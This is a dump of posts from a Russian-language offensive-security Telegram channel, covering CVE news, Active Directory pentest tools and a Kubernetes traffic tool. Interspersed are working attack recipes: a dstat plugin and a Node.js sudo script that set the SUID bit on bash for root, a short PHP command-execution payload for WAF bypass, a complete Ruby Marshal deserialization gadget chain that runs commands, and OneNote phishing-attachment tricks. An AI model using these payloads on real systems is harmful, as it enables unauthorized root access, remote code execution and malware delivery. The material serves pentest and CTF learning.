#privileges
Kernel privilege escalation vulnerability collection
Коллекция уязвимостей для повышения привилегий ядра на UNIX/Windows системах, со средой компиляции, деталями уязвимости, исполняемым файлом и т.п
https://github.com/Ascotbe/Kernelhub
Kernel privilege escalation vulnerability collection
⚒Коллекция уязвимостей для повышения привилегий ядра на UNIX/Windows системах, со средой компиляции, деталями уязвимости, исполняемым файлом и т.п
https://github.com/Ascotbe/Kernelhub
GitHub
GitHub - Ascotbe/Kernelhub: :palm_tree:Linux、macOS、Windows Kernel privilege escalation vulnerability collection, with compilation…
:palm_tree:Linux、macOS、Windows Kernel privilege escalation vulnerability collection, with compilation environment, demo GIF map, vulnerability details, executable file (提权漏洞合集) - GitHub - Ascotbe...
❤1🔥1
#exploit
0-day RCE vulnerability on Microsoft Exchange Server✉️
Кратко: была найдена новая уязвимость в Microsoft Exchange Server
Как ее задетектить у себя на сервере?
🔸Get-ChildItem -Recurse -Path <Path_IIS_Logs> -Filter "*.log" | Select-String -Pattern 'powershell.*autodiscover\.json.*\@.*200
Сканер по данной уязвимости:
🔸https://github.com/VNCERT-CC/0dayex-checker
Все подробности можно посмотреть здесь:
🔸https://www.gteltsc.vn/blog/warning-new-attack-campaign-utilized-a-new-0day-rce-vulnerability-on-microsoft-exchange-server-12715.html
0-day RCE vulnerability on Microsoft Exchange Server✉️
Кратко: была найдена новая уязвимость в Microsoft Exchange Server
Как ее задетектить у себя на сервере?
🔸Get-ChildItem -Recurse -Path <Path_IIS_Logs> -Filter "*.log" | Select-String -Pattern 'powershell.*autodiscover\.json.*\@.*200
Сканер по данной уязвимости:
🔸https://github.com/VNCERT-CC/0dayex-checker
Все подробности можно посмотреть здесь:
🔸https://www.gteltsc.vn/blog/warning-new-attack-campaign-utilized-a-new-0day-rce-vulnerability-on-microsoft-exchange-server-12715.html
GitHub
GitHub - VNCERT-CC/0dayex-checker: Zeroday Microsoft Exchange Server checker (Virtual Patching checker)
Zeroday Microsoft Exchange Server checker (Virtual Patching checker) - VNCERT-CC/0dayex-checker
Forwarded from NETRUNNER GROUP (Сергей Зыбнев)
#ЦиклСтатей_Сети
В этой статье мы разберем основные сетевые протоколы и на каких портах они работают по умолчанию.
Стандартные порты-протоколы.
При изучении соблюдайте порядок ❤️
В этой статье мы разберем основные сетевые протоколы и на каких портах они работают по умолчанию.
Стандартные порты-протоколы.
При изучении соблюдайте порядок ❤️
Telegraph
Стандартные порты-протоколы.
В этой статье мы разберем основные сетевые протоколы и на каких портах они работают по умолчанию. 20-21 File Transfer Protocol - (FTP, FTP-DATA) FTP (File Transfer Protocol) — это протокол доступа, предназначенный для удаленной передачи файлов. Простыми словами…
#cve
CVE-2022-40684
В продуктах Fortinet (FortiOS, FortiProxy и FortiSwitchManager) была найдена уязвимость, позволяющая обойти аутентификацию и конфигурацию LDAP, путем извлечения пользователей с привилегиями администратора
Все нужные ресурсы:
🔸https://github.com/carlosevieira/CVE-2022-40684
🔸https://www.usergate.com/ru/security-reports/CVE-2022-40684
CVE-2022-40684
В продуктах Fortinet (FortiOS, FortiProxy и FortiSwitchManager) была найдена уязвимость, позволяющая обойти аутентификацию и конфигурацию LDAP, путем извлечения пользователей с привилегиями администратора
Все нужные ресурсы:
🔸https://github.com/carlosevieira/CVE-2022-40684
🔸https://www.usergate.com/ru/security-reports/CVE-2022-40684
GitHub
GitHub - carlosevieira/CVE-2022-40684: PoC for CVE-2022-40684 - Authentication bypass lead to Full device takeover (Read-only)
PoC for CVE-2022-40684 - Authentication bypass lead to Full device takeover (Read-only) - carlosevieira/CVE-2022-40684
👍1
#cve202233679
Что такое Kerberos и что за CVE-2022-33679?
Решил разобраться с Kerberos, а тут еще новая вулна появилась с ней.
Данная вулна позволяет аутентифицироваться как другой пользователь, НО если пользователь был настроен на отключение стандартных требований предварительной аутентификации.
Читать тут...
Если кого-то интересует только CVE, то все полезные ресурсы вы найдете здесь:
🔘https://googleprojectzero.blogspot.com/2022/10/rc4-is-still-considered-harmful.html
🔘https://github.com/Bdenneu/CVE-2022-33679
Что такое Kerberos и что за CVE-2022-33679?
Решил разобраться с Kerberos, а тут еще новая вулна появилась с ней.
Данная вулна позволяет аутентифицироваться как другой пользователь, НО если пользователь был настроен на отключение стандартных требований предварительной аутентификации.
Читать тут...
Если кого-то интересует только CVE, то все полезные ресурсы вы найдете здесь:
🔘https://googleprojectzero.blogspot.com/2022/10/rc4-is-still-considered-harmful.html
🔘https://github.com/Bdenneu/CVE-2022-33679
Telegraph
Что такое Kerberos и что за CVE-2022-33679?
Основы Kerberos - это протокол для аутентификации запросов на обслуживание между доверенными узлами в недоверенной сети. Данный протокол достаточно широко распространен, а с момента выхода Windows 2000 компания Microsoft использует протокол Kerberos в качестве…
👍1🔥1
#windows
Полезные тулзы во время пентеста Active Directory
Список самый простой, но интересный:
🔘 Impacket - набор для работы с сетевыми протоколами в инфраструктуре AD
🔘 Bloodhound - сбор информации об инфраструктуре AD
🔘 PowerSploit - модифицирует и подготавливает скрипты для выполнения кода на машине жертвы.
🔘 Neo4j - помогает структурировать данные
🔘 Mimikatz - позволяет просматривать и сохранять учетные данные
🔘 Evil-WinRM - WinRM Shell
🔘 Kerbrute - можно сделать User Enumeration
🔘 Responder - можно сделать SMB-Relay
Полезные тулзы во время пентеста Active Directory
Список самый простой, но интересный:
🔘 Impacket - набор для работы с сетевыми протоколами в инфраструктуре AD
🔘 Bloodhound - сбор информации об инфраструктуре AD
🔘 PowerSploit - модифицирует и подготавливает скрипты для выполнения кода на машине жертвы.
🔘 Neo4j - помогает структурировать данные
🔘 Mimikatz - позволяет просматривать и сохранять учетные данные
🔘 Evil-WinRM - WinRM Shell
🔘 Kerbrute - можно сделать User Enumeration
🔘 Responder - можно сделать SMB-Relay
GitHub
GitHub - fortra/impacket: Impacket is a collection of Python classes for working with network protocols.
Impacket is a collection of Python classes for working with network protocols. - fortra/impacket
❤1
Forwarded from Proxy Bar
Рановато, но таки да
ТОП 10 из 2022
1. Follina (CVE-2022-30190)
2. Log4Shell (CVE-2021-44228)
3. Spring4Shell (CVE-2022-22965)
4. F5 BIG-IP (CVE-2022-1388)
5. Google Chrome zero-day (CVE-2022-0609)
6. Old but not forgotten - Microsoft Office bug (CVE-2017-11882)
7. ProxyNotShell (CVE-2022-41082, CVE-2022-41040)
8. Zimbra Collaboration Suite bugs (CVE-2022-27925, CVE-2022-41352)
9. Atlassian Confluence RCE flaw (CVE-2022-26134)
10. Zyxel RCE vulnerability (CVE-2022-30525)
ТОП 10 из 2022
1. Follina (CVE-2022-30190)
2. Log4Shell (CVE-2021-44228)
3. Spring4Shell (CVE-2022-22965)
4. F5 BIG-IP (CVE-2022-1388)
5. Google Chrome zero-day (CVE-2022-0609)
6. Old but not forgotten - Microsoft Office bug (CVE-2017-11882)
7. ProxyNotShell (CVE-2022-41082, CVE-2022-41040)
8. Zimbra Collaboration Suite bugs (CVE-2022-27925, CVE-2022-41352)
9. Atlassian Confluence RCE flaw (CVE-2022-26134)
10. Zyxel RCE vulnerability (CVE-2022-30525)
🔥2🤔1
Смотрим Flipper Zero и немного модифицируем
Думал еще потыкать API-ху, но разрабы все ещё ее пилят. Поэтому ждем релиза документации
https://telegra.ph/Smotrim-i-nemnogo-modificiruem-Flipper-Zero-12-07
Думал еще потыкать API-ху, но разрабы все ещё ее пилят. Поэтому ждем релиза документации
https://telegra.ph/Smotrim-i-nemnogo-modificiruem-Flipper-Zero-12-07
Telegraph
Смотрим и немного модифицируем Flipper Zero
Flipper Zero - это портативный мультиинструмент для пентестеров как игрушка. Он предназначен для взлома цифровых устройств, таких как радио-протоколы, системы контроля доступа, аппаратное обеспечение и т.п. Он полностью с открытым исходным кодом и настраиваемый…
🔥6
Forwarded from Похек
Nuclei v2.8.0 - Fuzz all the way!
Объявление о выходе Nuclei v2.8.0 с новыми возможностями фаззинга, общими переменными для рабочих процессов, загрузкой шаблонов GitHub/AWS S3, интеграцией с asnmap, uncover и httpx и, конечно, многим другим!
Это лишь несколько основных моментов из 30+ улучшений в этом релизе. Читайте дальше, чтобы ознакомиться со всеми значительными обновлениями.
Мы также хотим поблагодарить сообщество ProjectDiscovery за 5+ вкладов, которые они внесли в Nuclei v2.8.0! В ProjectDiscovery сообщество является основой; мы гордимся нашим сообществом и командой. Мы надеемся, что вам понравится новый релиз. Счастливого взлома!
#tools
Объявление о выходе Nuclei v2.8.0 с новыми возможностями фаззинга, общими переменными для рабочих процессов, загрузкой шаблонов GitHub/AWS S3, интеграцией с asnmap, uncover и httpx и, конечно, многим другим!
Это лишь несколько основных моментов из 30+ улучшений в этом релизе. Читайте дальше, чтобы ознакомиться со всеми значительными обновлениями.
Мы также хотим поблагодарить сообщество ProjectDiscovery за 5+ вкладов, которые они внесли в Nuclei v2.8.0! В ProjectDiscovery сообщество является основой; мы гордимся нашим сообществом и командой. Мы надеемся, что вам понравится новый релиз. Счастливого взлома!
#tools
🔥3
Kubernetes + Wireshark = KubeShark
По факту, эта тулза позволяет просматривать трафик вашего кластера на K8S.
Если хотите посмотреть данную тулзу, то:
Проверяем, что есть доступ к DockerHub
Совершаем установку:
Запускаем:
Выбираем нужный POD и играемся:
Также можно выбрать определенный namespace:
А можно все сразу:
Всю документацию можно найти здесь
По факту, эта тулза позволяет просматривать трафик вашего кластера на K8S.
Если хотите посмотреть данную тулзу, то:
Проверяем, что есть доступ к DockerHub
Совершаем установку:
sh <(curl -Ls https://kubeshark.co/install) Запускаем:
kubeshark tapВыбираем нужный POD и играемся:
kubeshark tap catalogue-b87b45784-sxc8qТакже можно выбрать определенный namespace:
kubeshark tap -n sock-shopА можно все сразу:
kubeshark tap -AВсю документацию можно найти здесь
GitHub
GitHub - kubeshark/kubeshark: API traffic analyzer for Kubernetes, providing deep packet inspection with complete API and Kubernetes…
API traffic analyzer for Kubernetes, providing deep packet inspection with complete API and Kubernetes contexts, retaining cluster-wide L4 traffic (PCAP), and using minimal production compute resou...
❤1👏1
Forwarded from Похек
Пак свежих и эксплуатируемых CVE для Apple:
CVE-2022-22587 (IOMobileFrameBuffer) – A malicious application may be able to execute arbitrary code with kernel privileges
CVE-2022-22594 (WebKit Storage) – A website may be able to track sensitive user information (publicly known but not actively exploited)
CVE-2022-22620 (WebKit) – Processing maliciously crafted web content may lead to arbitrary code execution
CVE-2022-22674 (Intel Graphics Driver) – An application may be able to read kernel memory
CVE-2022-22675 (AppleAVD) – An application may be able to execute arbitrary code with kernel privileges
CVE-2022-32893 (WebKit) – Processing maliciously crafted web content may lead to arbitrary code execution
CVE-2022-32894 (Kernel) – An application may be able to execute arbitrary code with kernel privileges
CVE-2022-32917 (Kernel) – An application may be able to execute arbitrary code with kernel privileges
CVE-2022-42827 (Kernel) – An application may be able to execute arbitrary code with kernel privileges
CVE-2022-22587 (IOMobileFrameBuffer) – A malicious application may be able to execute arbitrary code with kernel privileges
CVE-2022-22594 (WebKit Storage) – A website may be able to track sensitive user information (publicly known but not actively exploited)
CVE-2022-22620 (WebKit) – Processing maliciously crafted web content may lead to arbitrary code execution
CVE-2022-22674 (Intel Graphics Driver) – An application may be able to read kernel memory
CVE-2022-22675 (AppleAVD) – An application may be able to execute arbitrary code with kernel privileges
CVE-2022-32893 (WebKit) – Processing maliciously crafted web content may lead to arbitrary code execution
CVE-2022-32894 (Kernel) – An application may be able to execute arbitrary code with kernel privileges
CVE-2022-32917 (Kernel) – An application may be able to execute arbitrary code with kernel privileges
CVE-2022-42827 (Kernel) – An application may be able to execute arbitrary code with kernel privileges
🔥3👍1
Dstat Privilege Escalation
dstat можно использовать для мониторинга и просмотра системных ресурсов. Он поддерживает настраиваемые плагины. Поэтому мы можем создать вредоносный плагин, выполняющий код и запустить dstat с правами root.
Находим директорию с dstat:
Создаем плагин в той же директории, где и dstat с последующим кодом:
Смотрим, что хост видит плагин:
Запускаем:
И получаем рута:
dstat можно использовать для мониторинга и просмотра системных ресурсов. Он поддерживает настраиваемые плагины. Поэтому мы можем создать вредоносный плагин, выполняющий код и запустить dstat с правами root.
Находим директорию с dstat:
find / -type d -name dstat 2>/dev/nullСоздаем плагин в той же директории, где и dstat с последующим кодом:
import os
os.system('chmod +s /usr/bin/bash')Смотрим, что хост видит плагин:
dstat --list | grep <plugin_name>Запускаем:
doas -u root /usr/bin/dstat –<plugin_name>
И получаем рута:
bash -pPHP Filter Chain Generator
Если вам нужно обойти WAF или другой механизм проверки, то существует интересная тулза, которая помогает выполнить RCE без загрузки файла, естественно если вы можете играться с параметрами php.
Но сгенерированный результат получается длинным, а на сайте может быть ограничение по количеству символов.
Следовательно, нам нужно использовать короткие формы php, чтобы сделать нашу полезную нагрузку как можно короче
Так php тэг, можно просто представить в следующем виде <?php ?> :
А функцию system('<cmd>'), мы можем просто заменить на
И самый простетский пэйлоад будет выглядеть так
Если вам нужно обойти WAF или другой механизм проверки, то существует интересная тулза, которая помогает выполнить RCE без загрузки файла, естественно если вы можете играться с параметрами php.
Но сгенерированный результат получается длинным, а на сайте может быть ограничение по количеству символов.
Следовательно, нам нужно использовать короткие формы php, чтобы сделать нашу полезную нагрузку как можно короче
Так php тэг, можно просто представить в следующем виде <?php ?> :
<?= ?>А функцию system('<cmd>'), мы можем просто заменить на
``И самый простетский пэйлоад будет выглядеть так
<?= `<cmd>` ?>GitHub
GitHub - synacktiv/php_filter_chain_generator
Contribute to synacktiv/php_filter_chain_generator development by creating an account on GitHub.
❤1👏1
Forwarded from iMelnik
Очень недурная подборка тулзов для редтиминга.👁️🗨️
https://github.com/A-poc/RedTeam-Tools
Всем 🦫, а 🌎 Миру — мир!
#redteam #tools
https://github.com/A-poc/RedTeam-Tools
Всем 🦫, а 🌎 Миру — мир!
#redteam #tools
GitHub
GitHub - A-poc/RedTeam-Tools: Tools and Techniques for Red Team / Penetration Testing
Tools and Techniques for Red Team / Penetration Testing - A-poc/RedTeam-Tools
🔥3😁1
Prototype-Pollution.pdf
145.8 KB
Йо, всем!
Решил тут немного изучить Prototype Pollution.
Старался максимально по простому описать все, поэтому надеюсь, что всем понравится
Решил тут немного изучить Prototype Pollution.
Старался максимально по простому описать все, поэтому надеюсь, что всем понравится
🔥2❤1🤔1
Executing Shell Commands with Node.js
Если ты увидишь, что-то такое
То ты можешь попробовать сделать sudo-права через node.js
Создаем любой js файл с последующим кодом
Затем запускаем exec-func
Все благодарности вот этому челу
Если ты увидишь, что-то такое
(ALL) /usr/bin/node /usr/local/noscripts/*.jsТо ты можешь попробовать сделать sudo-права через node.js
Создаем любой js файл с последующим кодом
const { exec } = require("child_process");
exec("chmod u+s /bin/bash", (error, stdout, stderr) => {
if (error) {
console.log(`error: ${error.message}`);
return;
}
if (stderr) {
console.log(`stderr: ${stderr}`);
return;
}
console.log(`stdout: ${stdout}`);
});Затем запускаем exec-func
sudo /usr/bin/node /usr/local/noscripts/../../../../../../folder-name/file.js
И там уже.../bin/bash -pВсе благодарности вот этому челу
❤2🔥1
Forwarded from 1N73LL1G3NC3
RedTeam With OneNote Sections
1. Not affected by Protected View/ MOTW
2. Allows embedding Malicious Excel/Word/PPT files that will be played without protected view
3. Allows embedding HTA, LNK, EXE files and spoof extensions
4. Possible to format document in a way user are tricked into opening a malicious file or a link
1. Not affected by Protected View/ MOTW
2. Allows embedding Malicious Excel/Word/PPT files that will be played without protected view
3. Allows embedding HTA, LNK, EXE files and spoof extensions
4. Possible to format document in a way user are tricked into opening a malicious file or a link
👏1
Ruby Insecure Deserialization
# RU
В Ruby также возможна иногда сделать RCE через десериализацию. В основном это возможно благодаря методу Marshall, который сериализует и десериализует объекты.
Снизу вы можете найти PoC
# EN
In Ruby, it is also possible to sometimes do RCE through deserialization. This is mostly possible through the Marshall method, which serializes and deserializes objects.
At the bottom you can find the PoC
# RU
Более подробно можно узнать здесь
# EN
Learn more here
# RU
Есть еще тулза
# EN
There is also a tool
# RU
В Ruby также возможна иногда сделать RCE через десериализацию. В основном это возможно благодаря методу Marshall, который сериализует и десериализует объекты.
Снизу вы можете найти PoC
# EN
In Ruby, it is also possible to sometimes do RCE through deserialization. This is mostly possible through the Marshall method, which serializes and deserializes objects.
At the bottom you can find the PoC
require 'base64'
Gem::SpecFetcher
Gem::Installer
module Gem
class Requirement
def marshal_dump
[@requirements]
end
end
end
wa1 = Net::WriteAdapter.new(Kernel, :system)
rs = Gem::RequestSet.allocate
rs.instance_variable_set('@sets', wa1)
rs.instance_variable_set('@git_set', "id")
wa2 = Net::WriteAdapter.new(rs, :resolve)
i = Gem::Package::TarReader::Entry.allocate
i.instance_variable_set('@read', 0)
i.instance_variable_set('@header', "aaa")
n = Net::BufferedIO.allocate
n.instance_variable_set('@io', i)
n.instance_variable_set('@debug_output', wa2)
t = Gem::Package::TarReader.allocate
t.instance_variable_set('@io', n)
r = Gem::Requirement.allocate
r.instance_variable_set('@requirements', t)
payload = Marshal.dump([Gem::SpecFetcher, Gem::Installer, r])
puts Base64.encode64(payload)# RU
Более подробно можно узнать здесь
# EN
Learn more here
https://devcraft.io/2021/01/07/universal-deserialisation-gadget-for-ruby-2-x-3-x.htmlhttps://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_ruby.htmlhttps://bishopfox.com/blog/ruby-vulnerabilities-exploits# RU
Есть еще тулза
# EN
There is also a tool
https://github.com/klezVirus/deser-ruby